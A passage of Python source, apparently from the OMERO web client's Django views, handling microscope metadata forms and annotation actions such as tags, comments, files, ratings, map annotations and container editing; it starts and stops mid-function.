                                    "lightSource": lightSrc,
                                    "lightSourceSettings": lightSourceSettings,
                                    "lstypes": lstypes,
                                    "mediums": list(
                                        conn.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        conn.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                # TODO: We don't display filter sets here yet since they are
                # not populated on Import by BioFormats.
                channel["label"] = ch.getLabel()
                color = ch.getColor()
                channel["color"] = color is not None and color.getHtml() or None
                planeInfo = (
                    manager.image
                    and manager.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                plane_info = []
                # collect per-timepoint deltaT/exposure (in seconds)
                for pi in planeInfo:
                    deltaT = pi.getDeltaT(units="SECOND")
                    exposure = pi.getExposureTime(units="SECOND")
                    if deltaT is None and exposure is None:
                        continue
                    if deltaT is not None:
                        deltaT = deltaT.getValue()
                    if exposure is not None:
                        exposure = exposure.getValue()
                    plane_info.append(
                        {"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
                    )
                channel["plane_info"] = plane_info
                form_channels.append(channel)

        # Prefer the well-sample image when viewing a well; fall back to
        # the manager's image otherwise.
        try:
            image = manager.well.getWellSample().image()
        except Exception:
            image = manager.image

        if share_id is None:  # 9853
            if image.getObjectiveSettings() is not None:
                # load the enums if needed and create our Objective Form
                if mediums is None:
                    mediums = list(conn.getEnumerationEntries("MediumI"))
                if immersions is None:
                    immersions = list(conn.getEnumerationEntries("ImmersionI"))
                if corrections is None:
                    corrections = list(conn.getEnumerationEntries("CorrectionI"))
                form_objective = MetadataObjectiveSettingsForm(
                    initial={
                        "objectiveSettings": image.getObjectiveSettings(),
                        "objective": image.getObjectiveSettings().getObjective(),
                        "mediums": mediums,
                        "immersions": immersions,
                        "corrections": corrections,
                    }
                )
            if image.getImagingEnvironment() is not None:
                form_environment = MetadataEnvironmentForm(initial={"image": image})
            if image.getStageLabel() is not None:
                form_stageLabel = MetadataStageLabelForm(initial={"image": image})

            instrument = image.getInstrument()
            if instrument is not None:
                if instrument.getMicroscope() is not None:
                    form_microscope = MetadataMicroscopeForm(
                        initial={
                            "microscopeTypes": list(
                                conn.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": instrument.getMicroscope(),
                        }
                    )

                objectives = instrument.getObjectives()
                for o in objectives:
                    # load the enums if needed and create our Objective Form
                    if mediums is None:
                        mediums = list(conn.getEnumerationEntries("MediumI"))
                    if immersions is None:
                        immersions = list(conn.getEnumerationEntries("ImmersionI"))
                    if corrections is None:
                        corrections = list(conn.getEnumerationEntries("CorrectionI"))
                    obj_form = MetadataObjectiveForm(
                        initial={
                            "objective": o,
                            "mediums": mediums,
                            "immersions": immersions,
                            "corrections": corrections,
                        }
                    )
                    form_instrument_objectives.append(obj_form)

                filters = list(instrument.getFilters())
                if len(filters) > 0:
                    for f in filters:
                        form_filter = MetadataFilterForm(
                            initial={
                                "filter": f,
                                "types": list(
                                    conn.getEnumerationEntries("FilterTypeI")
                                ),
                            }
                        )
                        form_filters.append(form_filter)

                dichroics = list(instrument.getDichroics())
                for d in dichroics:
                    form_dichroic = MetadataDichroicForm(initial={"dichroic": d})
                    form_dichroics.append(form_dichroic)

                detectors = list(instrument.getDetectors())
                if len(detectors) > 0:
                    for d in detectors:
                        form_detector = MetadataDetectorForm(
                            initial={
                                "detectorSettings": None,
                                "detector": d,
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                            }
                        )
                        form_detectors.append(form_detector)

                lasers = list(instrument.getLightSources())
                if len(lasers) > 0:
                    for laser in lasers:
                        # pick the enum list matching the source class
                        lstypes = lasertypes
                        if laser.OMERO_CLASS == "Arc":
                            lstypes = arctypes
                        elif laser.OMERO_CLASS == "Filament":
                            lstypes = filamenttypes
                        form_laser = MetadataLightSourceForm(
                            initial={
                                "lightSource": laser,
                                "lstypes": lstypes,
                                "mediums": list(
                                    conn.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(conn.getEnumerationEntries("PulseI")),
                            }
                        )
                        form_lasers.append(form_laser)

    # TODO: remove this 'if' since we should only have c_type = 'image'?
    context = {"manager": manager, "share_id": share_id}
    if c_type not in ("share", "discussion", "tag"):
        context["form_channels"] = form_channels
        context["form_environment"] = form_environment
        context["form_objective"] = form_objective
        context["form_microscope"] = form_microscope
        context["form_instrument_objectives"] = form_instrument_objectives
        context["form_filters"] = form_filters
        context["form_dichroics"] = form_dichroics
        context["form_detectors"] = form_detectors
        context["form_lasers"] = form_lasers
        context["form_stageLabel"] = form_stageLabel

    context["template"] = template
    return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
    """Load the original (import-time) metadata for an image.

    Returns original/global/series metadata in the context, or a 408
    response if the server cannot acquire the file lock in time.
    """
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    context = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": image.getId(),
    }
    try:
        om = image.loadOriginalMetadata()
    except omero.LockTimeout:
        # 408 is Request Timeout
        return HttpResponse(content="LockTimeout", status=408)
    if om is not None:
        context["original_metadata"] = om[0]
        context["global_metadata"] = om[1]
        context["series_metadata"] = om[2]
    return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
    """
    Prepare objects for use in the annotation forms.

    These objects are required by the form superclass to populate hidden
    fields, so we know what we're annotating on submission.
    """
    r = request.GET or request.POST
    result = {}
    # Each request parameter maps to the OMERO object type to load.
    for param, dtype in (
        ("image", "Image"),
        ("dataset", "Dataset"),
        ("project", "Project"),
        ("screen", "Screen"),
        ("plate", "Plate"),
        ("acquisition", "PlateAcquisition"),
        ("well", "Well"),
    ):
        ids = r.getlist(param)
        result[param] = list(conn.getObjects(dtype, ids)) if ids else list()
    # Shares are loaded individually; only the first id is used.
    share_ids = r.getlist("share")
    result["share"] = [conn.getShare(share_ids[0])] if share_ids else list()
    return result
def getIds(request):
    """
    Return the ids of the currently selected objects (see getObjects),
    keyed by their pluralised type name.
    """
    r = request.GET or request.POST
    selected = {}
    for plural, param in (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    ):
        selected[plural] = r.getlist(param)
    return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
    """
    This page gives a form for batch annotation.
    Local File form and Comment form are loaded. Other forms are loaded via
    AJAX
    """

    objs = getObjects(request, conn)

    # get groups for selected objects - setGroup() and create links
    obj_ids = []
    obj_labels = []
    groupIds = set()
    annotationBlocked = False
    for key in objs:
        obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
        for o in objs[key]:
            groupIds.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                # remember (as a message) that at least one object is
                # not annotatable by the current user
                annotationBlocked = (
                    "Can't add annotations because you don't" " have permissions"
                )
            obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
    obj_string = "&".join(obj_ids)
    link_string = "|".join(obj_ids).replace("=", "-")
    if len(groupIds) == 0:
        # No supported objects found.
        # If multiple tags / tagsets selected, return placeholder
        if (
            len(request.GET.getlist("tag")) > 0
            or len(request.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate tags</h2>")
        else:
            return handlerInternalError(request, "No objects found")
    # use an arbitrary group from the selection as the service context
    groupId = list(groupIds)[0]
    conn.SERVICE_OPTS.setOmeroGroup(groupId)

    manager = BaseContainer(conn)
    figScripts = manager.listFigureScripts(objs)
    canExportAsJpg = manager.canExportAsJpg(request, objs)
    filesetInfo = None
    iids = []
    if "image" in objs and len(objs["image"]) > 0:
        iids = [i.getId() for i in objs["image"]]
    if len(iids) > 0:
        # combine fileset and archived-file counts/sizes for display
        filesetInfo = conn.getFilesetFilesInfo(iids)
        archivedInfo = conn.getArchivedFilesInfo(iids)
        filesetInfo["count"] += archivedInfo["count"]
        filesetInfo["size"] += archivedInfo["size"]

    context = {
        "iids": iids,
        "obj_string": obj_string,
        "link_string": link_string,
        "obj_labels": obj_labels,
        "batch_ann": True,
        "figScripts": figScripts,
        "canExportAsJpg": canExportAsJpg,
        "filesetInfo": filesetInfo,
        "annotationBlocked": annotationBlocked,
        "differentGroups": False,
    }
    if len(groupIds) > 1:
        context["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        context["differentGroups"] = True  # E.g. don't run scripts etc
    context["canDownload"] = manager.canDownload(objs)
    context["template"] = "webclient/annotations/batch_annotate.html"
    context["webclient_path"] = reverse("webindex")
    context["annotationCounts"] = manager.getBatchAnnotationCounts(
        getObjects(request, conn)
    )
    return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
    """
    On 'POST', This handles attaching an existing file-annotation(s) and/or
    upload of a new file to one or more objects
    Otherwise it generates the form for choosing file-annotations & local
    files.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }

    # Use the first object we find to set context (assume all objects are in
    # same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break

    obj_count = sum([len(selected[types]) for types in selected])
    if obj_count == 0:
        raise Http404("Need to specify objects via e.g. ?image=1")

    # Get appropriate manager, either to list available Files to add to single
    # object, or list ALL Files (multiple objects)
    manager = None
    if obj_count == 1:
        for t in selected:
            if len(selected[t]) > 0:
                o_type = t[:-1]  # "images" -> "image"
                o_id = selected[t][0]
                break
        if o_type in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if o_type == "tagset":
                # TODO: this should be handled by the BaseContainer
                o_type = "tag"
            kw = {}
            if o_type is not None and int(o_id) > 0:
                kw[str(o_type)] = int(o_id)
            try:
                manager = BaseContainer(conn, **kw)
            except AttributeError as x:
                return handlerInternalError(request, x)

    if manager is not None:
        files = manager.getFilesByObject()
    else:
        manager = BaseContainer(conn)
        for dtype, objs in oids.items():
            if len(objs) > 0:
                # NB: we only support a single data-type now. E.g. 'image' OR
                # 'dataset' etc.
                files = manager.getFilesByObject(
                    parent_type=dtype, parent_ids=[o.getId() for o in objs]
                )
                break

    # NOTE(review): 'files' would be unbound if no non-empty type is found
    # here; obj_count > 0 presumably guarantees one exists — confirm.
    initial["files"] = files

    if request.method == "POST":
        # handle form submission
        form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
        if form_file.is_valid():
            # Link existing files...
            files = form_file.cleaned_data["files"]
            added_files = []
            if files is not None and len(files) > 0:
                added_files = manager.createAnnotationsLinks("file", files, oids)
            # upload new file
            fileupload = (
                "annotation_file" in request.FILES
                and request.FILES["annotation_file"]
                or None
            )
            if fileupload is not None and fileupload != "":
                newFileId = manager.createFileAnnotations(fileupload, oids)
                added_files.append(newFileId)
            return JsonResponse({"fileIds": added_files})
        else:
            return HttpResponse(form_file.errors)
    else:
        # GET: render the unbound form
        form_file = FilesAnnotationForm(initial=initial)

    context = {"form_file": form_file}
    template = "webclient/annotations/files_form.html"
    context["template"] = template
    return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
    """Set a Rating on each of the objects identified in the request.

    Only POST is accepted; the rating value comes from the 'rating'
    POST parameter (defaulting to 0).
    Returns JSON {'success': True}.
    """
    if request.method != "POST":
        raise Http404("Only POST supported")
    score = getIntOrDefault(request, "rating", 0)
    targets = getObjects(request, conn)
    # Apply the same rating to every selected object, creating or
    # updating each object's rating annotation.
    for obj_list in targets.values():
        for obj in obj_list:
            obj.setRating(score)
    return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
    """Attach a new Comment annotation to one or more objects.

    Only a bound (POSTed) CommentAnnotationForm is supported; there is
    no unbound/GET version of this form.
    """
    if request.method != "POST":
        raise Http404("Unbound instance of form not available.")
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
        "shares": oids["share"],
    }
    # Switch to the group of the first object found (all objects are
    # assumed to be in the same group). Shares are exempt from this.
    if len(oids["share"]) < 1:
        for candidates in oids.values():
            if candidates:
                group_id = candidates[0].getDetails().group.id.val
                conn.SERVICE_OPTS.setOmeroGroup(group_id)
                break
    form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
    if not form_multi.is_valid():
        # TODO: handle invalid form error
        return HttpResponse(str(form_multi.errors))
    # In each case below we pass the {'object_type': [ids]} map
    content = form_multi.cleaned_data["comment"]
    if content is not None and content != "":
        shares = oids["share"]
        if shares is not None and len(shares) > 0:
            sid = shares[0].id
            manager = BaseShare(conn, sid)
            host = "%s?server=%i" % (
                request.build_absolute_uri(
                    reverse("load_template", args=["public"])
                ),
                int(conn.server_id),
            )
            textAnn = manager.addComment(host, content)
            # Shares need rendered html back for display...
            context = {
                "tann": textAnn,
                "added_by": conn.getUserId(),
                "template": "webclient/annotations/comment.html",
            }
        else:
            # ...otherwise Comments are re-loaded by AJAX json,
            # so only the new annotation id needs returning
            manager = BaseContainer(conn)
            annId = manager.createCommentAnnotations(content, oids)
            context = {"annId": annId, "added_by": conn.getUserId()}
    return context
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
    """
    Handle adding Map Annotations to one or more objects.

    POST data "mapAnnotation" should be a JSON list of ['key', 'value']
    pairs. If existing annotation IDs are POSTed as "annId" they are
    updated with the new data (or deleted when the data is empty);
    otherwise new Map Annotation(s) are created and linked to all the
    objects identified in the request.
    Returns {'annId': ids} for the created/updated annotations.
    """
    if request.method != "POST":
        raise Http404(
            "Need to POST map annotation data as list of" " ['key', 'value'] pairs"
        )
    oids = getObjects(request, conn)
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    # this does not apply to shares
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    data = request.POST.get("mapAnnotation")
    data = json.loads(data)
    annIds = request.POST.getlist("annId")
    ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    # Create a new annotation
    if len(annIds) == 0 and len(data) > 0:
        # Bug fix: the comparison result was previously discarded
        # ('duplicate.lower() == "true"' as a bare statement), leaving
        # 'duplicate' as a non-empty - hence always truthy - string.
        duplicate = request.POST.get("duplicate", "false").lower() == "true"
        # For 'client' map annotations, we enforce 1 annotation per object
        if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            duplicate = True
        if duplicate:
            # Create a new Map Annotation for each object:
            for k, objs in oids.items():
                for obj in objs:
                    ann = omero.gateway.MapAnnotationWrapper(conn)
                    ann.setValue(data)
                    ann.setNs(ns)
                    ann.save()
                    annIds.append(ann.getId())
                    obj.linkAnnotation(ann)
        else:
            # Create single Map Annotation and link to all objects
            ann = omero.gateway.MapAnnotationWrapper(conn)
            ann.setValue(data)
            ann.setNs(ns)
            ann.save()
            annIds.append(ann.getId())
            for k, objs in oids.items():
                for obj in objs:
                    obj.linkAnnotation(ann)
    # Or update existing annotations
    else:
        for annId in annIds:
            ann = conn.getObject("MapAnnotation", annId)
            if ann is None:
                continue
            if len(data) > 0:
                ann.setValue(data)
                ann.save()
            else:
                # Delete the annotation if no data was supplied
                handle = conn.deleteObjects("/Annotation", [annId])
                try:
                    conn._waitOnCmd(handle)
                finally:
                    handle.close()
        if len(data) == 0:
            annIds = None
    return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
    """
    Provides json data to ome.tagging_form.js.

    The 'jsonmode' GET parameter selects the payload: 'tagcount',
    'tags' (summaries without descriptions), 'desc' (descriptions
    keyed by tag id) or 'owners'.
    """
    group = get_long_or_default(request, "group", -1)
    conn.SERVICE_OPTS.setOmeroGroup(str(group))
    try:
        offset = int(request.GET.get("offset"))
        limit = int(request.GET.get("limit", 1000))
    except Exception:
        # offset absent or non-numeric: load without paging
        offset = limit = None
    mode = request.GET.get("jsonmode")
    if mode == "tagcount":
        return dict(tag_count=conn.getTagCount())
    manager = BaseContainer(conn)
    manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
    all_tags = manager.tags_recursive
    if mode == "tags":
        # tag info without descriptions
        return [(i, t, o, s) for i, d, t, o, s in all_tags]
    if mode == "desc":
        # descriptions keyed by tag id
        return {i: d for i, d, t, o, s in all_tags}
    if mode == "owners":
        return manager.tags_recursive_owners
    return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
    """
    This handles creation AND submission of Tags form, adding new AND/OR
    existing tags to one or more objects.

    GET renders the tagging dialog form; POST links newly-selected tags,
    creates any new tags from the formset, unlinks deselected tags, and
    returns JSON {'added': ..., 'removed': ..., 'new': ...}.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    obj_count = sum([len(selected[types]) for types in selected])
    # Get appropriate manager, either to list available Tags to add to single
    # object, or list ALL Tags (multiple objects)
    manager = None
    self_id = conn.getEventContext().userId
    tags = []
    # Use the first object we find to set context (assume all objects are
    # in same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    # Make a list of all current tags
    # As would be on right column of tagging dialog...
    taglist, users = tree.marshal_annotations(
        conn,
        project_ids=selected["projects"],
        dataset_ids=selected["datasets"],
        image_ids=selected["images"],
        screen_ids=selected["screens"],
        plate_ids=selected["plates"],
        run_ids=selected["acquisitions"],
        well_ids=selected["wells"],
        ann_type="tag",
        # If we reach this limit we'll get some tags not removed
        limit=ANNOTATIONS_LIMIT,
    )
    # Map experimenter id -> experimenter dict, used for owner names below
    userMap = {}
    for exp in users:
        userMap[exp["id"]] = exp
    # For batch annotate, only include tags that user has added to all objects
    if obj_count > 1:
        # count my links
        myLinkCount = {}
        for t in taglist:
            tid = t["id"]
            if tid not in myLinkCount:
                myLinkCount[tid] = 0
            if t["link"]["owner"]["id"] == self_id:
                myLinkCount[tid] += 1
        # filter: keep tags the current user linked to every selected object
        taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
    # Build (tag_id, user_id, owner_name, can_delete, created, link_owned)
    # tuples for the template / the de-selection logic below
    selected_tags = []
    for tag in taglist:
        linkOwnerId = tag["link"]["owner"]["id"]
        owner = userMap[linkOwnerId]
        ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
        canDelete = True
        created = tag["link"]["date"]
        linkOwned = linkOwnerId == self_id
        selected_tags.append(
            (tag["id"], self_id, ownerName, canDelete, created, linkOwned)
        )
    # selected_tags is really a list of tag LINKS.
    # May be several links per tag.id
    selected_tags.sort(key=lambda x: x[0])
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    if request.method == "POST":
        # handle form submission
        form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
        newtags_formset = NewTagsAnnotationFormSet(
            prefix="newtags", data=request.POST.copy()
        )
        # Create new tags or Link existing tags...
        if form_tags.is_valid() and newtags_formset.is_valid():
            # filter down previously selected tags to the ones linked by
            # current user
            selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
            # Remove duplicates from tag IDs
            selected_tag_ids = list(set(selected_tag_ids))
            post_tags = list(form_tags.cleaned_data["tags"])
            # 'tags' = newly ticked; 'removed' = previously linked but unticked
            tags = [tag for tag in post_tags if tag not in selected_tag_ids]
            removed = [tag for tag in selected_tag_ids if tag not in post_tags]
            manager = BaseContainer(conn)
            if tags:
                manager.createAnnotationsLinks("tag", tags, oids)
            new_tags = []
            for form in newtags_formset.forms:
                new_tags.append(
                    manager.createTagAnnotations(
                        form.cleaned_data["tag"],
                        form.cleaned_data["description"],
                        oids,
                        tag_group_id=form.cleaned_data["tagset"],
                    )
                )
            # only remove Tags where the link is owned by self_id
            for remove in removed:
                tag_manager = BaseContainer(conn, tag=remove)
                tag_manager.remove(
                    [
                        "%s-%s" % (dtype, obj.id)
                        for dtype, objs in oids.items()
                        for obj in objs
                    ],
                    tag_owner_id=self_id,
                )
            return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
        else:
            # TODO: handle invalid form error
            return HttpResponse(str(form_tags.errors))
    else:
        # GET: render unbound forms for the tagging dialog
        form_tags = TagsAnnotationForm(initial=initial)
        newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
    context = {
        "form_tags": form_tags,
        "newtags_formset": newtags_formset,
        "selected_tags": selected_tags,
    }
    template = "webclient/annotations/tags_form.html"
    context["template"] = template
    return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
    """
    Edit and save channel names for an Image.

    POST parameters 'channel0', 'channel1', ... hold the new names.
    If 'confirm_apply' is POSTed, names are applied to all images under
    the parent given by 'parentId' (e.g. "dataset-123" or "plate-45");
    otherwise they are saved on the single image only.
    Returns the saved names plus image/update counts, or an error dict.
    """
    image = conn.getObject("Image", imageId)
    sizeC = image.getSizeC()
    channelNames = {}
    nameDict = {}
    for i in range(sizeC):
        cname = request.POST.get("channel%d" % i, None)
        if cname is not None:
            cname = smart_str(cname)[:255]  # Truncate to fit in DB
            channelNames["channel%d" % i] = cname
            nameDict[i + 1] = cname
    # Bug fix: previously 'counts' was unbound (NameError) when
    # 'confirm_apply' was POSTed without a valid 'parentId'; now that
    # case falls through to the error response below.
    counts = None
    # If the 'Apply to Dataset' button was used to submit...
    if request.POST.get("confirm_apply", None) is not None:
        # plate-123 OR dataset-234
        parentId = request.POST.get("parentId", None)
        if parentId is not None:
            ptype = parentId.split("-")[0].title()
            pid = long(parentId.split("-")[1])
            counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
    else:
        counts = conn.setChannelNames("Image", [image.getId()], nameDict)
    rv = {"channelNames": channelNames}
    if counts:
        rv["imageCount"] = counts["imageCount"]
        rv["updateCount"] = counts["updateCount"]
        return rv
    else:
        return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
    request, action, o_type=None, o_id=None, conn=None, **kwargs
):
    """
    Handles many different actions on various objects.

    @param action:  "addnewcontainer" (creates a new Project, Dataset,
                    Screen), "editname", "savename", "editdescription",
                    "savedescription" (used as GET and POST for in-line
                    editing),
                    "edit"/"save" (Share editing),
                    "removefromshare" (tree P/D/I moving etc),
                    "delete", "deletemany" (delete objects),
                    "remove" (remove tag/comment from object)
    @param o_type:  "dataset", "project", "image", "screen", "plate",
                    "acquisition", "well", "comment", "file", "tag",
                    "tagset", "share", "sharecomment"

    Most action branches return JSON or an HttpResponse directly; only
    the form-rendering branches fall through to return a context dict.
    NOTE(review): a branch that neither returns early nor assigns
    'context' would hit a NameError at the final 'context["template"]'
    line - confirm all reachable paths do one or the other.
    """
    template = None
    manager = None
    # Choose a manager for the target: a BaseContainer wrapping the
    # specific object, a BaseShare for share-related types, or a plain
    # BaseContainer when no (valid) target id is given.
    if o_type in (
        "dataset",
        "project",
        "image",
        "screen",
        "plate",
        "acquisition",
        "well",
        "comment",
        "file",
        "tag",
        "tagset",
    ):
        kw = {}
        if o_type is not None and int(o_id) > 0:
            o_id = int(o_id)
            kw[str(o_type)] = o_id
        try:
            manager = BaseContainer(conn, **kw)
        except AttributeError as x:
            return handlerInternalError(request, x)
    elif o_type in ("share", "sharecomment", "chat"):
        manager = BaseShare(conn, o_id)
    else:
        manager = BaseContainer(conn)
    form = None
    if action == "addnewcontainer":
        # Used within the jsTree to add a new Project, Dataset, Tag,
        # Tagset etc under a specified parent OR top-level
        if not request.method == "POST":
            return JsonResponse(
                {"Error": "Must use POST to create container"}, status=405
            )
        form = ContainerForm(data=request.POST.copy())
        if form.is_valid():
            logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
            name = form.cleaned_data["name"]
            description = form.cleaned_data["description"]
            owner = form.cleaned_data["owner"]
            if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
                # New Dataset under an existing Project
                oid = manager.createDataset(name, description, owner=owner)
            elif o_type == "tagset" and o_id > 0:
                # New Tag under an existing Tagset
                oid = manager.createTag(name, description, owner=owner)
            elif request.POST.get("folder_type") in (
                "project",
                "screen",
                "dataset",
                "tag",
                "tagset",
            ):
                # No parent specified. We can create orphaned 'project',
                # 'dataset' etc.
                folder_type = request.POST.get("folder_type")
                if folder_type == "dataset":
                    oid = manager.createDataset(
                        name,
                        description,
                        owner=owner,
                        img_ids=request.POST.getlist("image", None),
                    )
                else:
                    oid = conn.createContainer(
                        folder_type, name, description, owner=owner
                    )
            else:
                return HttpResponseServerError("Object does not exist")
            rdict = {"bad": "false", "id": oid}
            return JsonResponse(rdict)
        else:
            # Report per-field form errors back to the client
            d = dict()
            for e in form.errors.items():
                d.update({e[0]: unicode(e[1])})
            rdict = {"bad": "true", "errs": d}
            return JsonResponse(rdict)
    elif action == "edit":
        # form for editing Shares only
        if o_id is None:
            raise Http404("No share ID")
        if o_type == "share" and int(o_id) > 0:
            template = "webclient/public/share_form.html"
            manager.getMembers(o_id)
            manager.getComments(o_id)
            experimenters = list(conn.getExperimenters())
            experimenters.sort(key=lambda x: x.getOmeName().lower())
            initial = {
                "message": manager.share.message,
                "expiration": "",
                "shareMembers": manager.membersInShare,
                "enable": manager.share.active,
                "experimenters": experimenters,
            }
            if manager.share.getExpireDate() is not None:
                initial["expiration"] = manager.share.getExpireDate().strftime(
                    "%Y-%m-%d"
                )
            form = ShareForm(initial=initial)  # 'guests':share.guestsInShare,
            context = {"manager": manager, "form": form}
    elif action == "save":
        # Handles submission of the 'edit' form above. TODO: not used now?
        if not request.method == "POST":
            return HttpResponseRedirect(
                reverse("manage_action_containers", args=["edit", o_type, o_id])
            )
        if o_type == "share":
            experimenters = list(conn.getExperimenters())
            experimenters.sort(key=lambda x: x.getOmeName().lower())
            form = ShareForm(
                initial={"experimenters": experimenters}, data=request.POST.copy()
            )
            if form.is_valid():
                logger.debug("Update share: %s" % (str(form.cleaned_data)))
                message = form.cleaned_data["message"]
                expiration = form.cleaned_data["expiration"]
                members = form.cleaned_data["members"]
                # guests = request.POST['guests']
                enable = form.cleaned_data["enable"]
                # Base URL used in share-notification emails/links
                host = "%s?server=%i" % (
                    request.build_absolute_uri(
                        reverse("load_template", args=["public"])
                    ),
                    int(conn.server_id),
                )
                manager.updateShareOrDiscussion(
                    host, message, members, enable, expiration
                )
                r = "enable" if enable else "disable"
                return HttpResponse(r)
            else:
                template = "webclient/public/share_form.html"
                context = {"share": manager, "form": form}
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "editname":
        # start editing 'name' in-line
        if hasattr(manager, o_type) and o_id > 0:
            obj = getattr(manager, o_type)
            template = "webclient/ajax_form/container_form_ajax.html"
            if o_type == "tag":
                # Tags store their name in textValue, not name
                txtValue = obj.textValue
            else:
                txtValue = obj.getName()
            form = ContainerNameForm(initial={"name": txtValue})
            context = {"manager": manager, "form": form}
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "savename":
        # Save name edit in-line
        if not request.method == "POST":
            return HttpResponseRedirect(
                reverse("manage_action_containers", args=["edit", o_type, o_id])
            )
        if hasattr(manager, o_type) and o_id > 0:
            form = ContainerNameForm(data=request.POST.copy())
            if form.is_valid():
                logger.debug("Update name form:" + str(form.cleaned_data))
                name = form.cleaned_data["name"]
                rdict = {"bad": "false", "o_type": o_type}
                manager.updateName(o_type, name)
                return JsonResponse(rdict)
            else:
                d = dict()
                for e in form.errors.items():
                    d.update({e[0]: unicode(e[1])})
                rdict = {"bad": "true", "errs": d}
                return JsonResponse(rdict)
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "editdescription":
        # start editing description in-line
        if hasattr(manager, o_type) and o_id > 0:
            obj = getattr(manager, o_type)
            template = "webclient/ajax_form/container_form_ajax.html"
            form = ContainerDescriptionForm(initial={"description": obj.description})
            context = {"manager": manager, "form": form}
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "savedescription":
        # Save editing of description in-line
        if not request.method == "POST":
            return HttpResponseServerError(
                "Action '%s' on the '%s' id:%s cannot be complited"
                % (action, o_type, o_id)
            )
        if hasattr(manager, o_type) and o_id > 0:
            form = ContainerDescriptionForm(data=request.POST.copy())
            if form.is_valid():
                logger.debug("Update name form:" + str(form.cleaned_data))
                description = form.cleaned_data["description"]
                manager.updateDescription(o_type, description)
                rdict = {"bad": "false"}
                return JsonResponse(rdict)
            else:
                d = dict()
                for e in form.errors.items():
                    d.update({e[0]: unicode(e[1])})
                rdict = {"bad": "true", "errs": d}
                return JsonResponse(rdict)
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "remove":
        # Handles removal of comment, tag from
        # Object etc.
        # E.g. image-123 or image-1|image-2
        parents = request.POST["parent"]
        try:
            manager.remove(parents.split("|"))
        except Exception as x:
